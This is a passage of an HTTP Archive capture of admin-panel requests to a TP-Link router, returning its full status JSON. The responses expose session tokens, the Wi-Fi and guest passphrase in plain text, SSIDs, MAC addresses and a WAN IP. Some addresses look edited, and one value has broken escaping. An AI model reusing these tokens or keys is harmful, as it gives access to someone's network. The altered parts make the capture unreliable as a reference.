200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 260,\r\n \"dns\": 251,\r\n \"connect\": 528,\r\n \"send\": 0,\r\n \"wait\": 796,\r\n \"receive\": 5\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.646+03:00\",\r\n \"time\": 979,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.07,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 274,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.654+03:00\",\r\n \"time\": 1814,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 532,\r\n \"send\": 0,\r\n \"wait\": 761,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.645+03:00\",\r\n \"time\": 952,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"187.60.220.34\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 657,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.648+03:00\",\r\n \"time\": 1798,\r\n 